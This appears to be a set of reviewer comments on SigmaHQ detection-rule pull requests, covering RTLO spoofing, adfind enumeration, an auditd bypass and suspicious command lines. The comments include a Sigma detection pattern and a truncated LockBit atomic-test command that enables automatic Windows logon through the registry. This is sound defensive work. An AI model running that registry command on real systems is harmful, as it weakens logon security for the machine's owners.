frack113

Look fine to me

HI, For RTLO there is a rule https://github.com/SigmaHQ/sigma/blob/2bfb0935a08c52859f2653bf51dbf9f4bbb5d7aa/rules/windows/file/file_event/file_event_win_susp_right_to_left_override_extension_spoofing.yml It is better to update the old one as there are similar.

Hi, The purpose of the rule is to detect ActiveDirectory Enumeration., and with the update even start adfind will generate a high alert. I think it is better to put...

HI, https://github.com/CheraghiMilad/bypass-Neo23x0-auditd-config/blob/f1c478a37911a5447d5ffcd580f22b167bf3df14/prctl-syscall/README.md is not found. a0 is https://man7.org/linux/man-pages/man2/PR_SET_NAME.2const.html, isn't it ?

Thanks for the video and the link fix. With only ` "a0": "f",` and no code source, I had the read the C header to find the PR_SET_NAME 😄

I prefer to stay with the pattern : ```yaml selection_parent: ParentImage|endswith: '\explorer.exe' CommandLine|contains: '#' selection_cmd: CommandLine|contains: # Add more suspicious keyword ``` `CommandLine|contains: 'http'` may have too many false positif

Hi, Sorry,it took me a while to do the research but the rule https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_reg_susp_paths.yml cover it. Find atomic test from lockbit https://github.com/redcanaryco/atomic-red-team/blob/8ac5c4f84692b11ea2832d18d3dc6f1ce7fb4e41/atomics/T1562.001/T1562.001.md#atomic-test-33---lockbit-black---use-registry-editor-to-turn-on-automatic-logon--cmd ```cmd reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t...

[5e6a80c8-2d45-4633-9ef4-fa2671a39c5c](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_double_extension_parent.yml) should be updated too , isn't it ?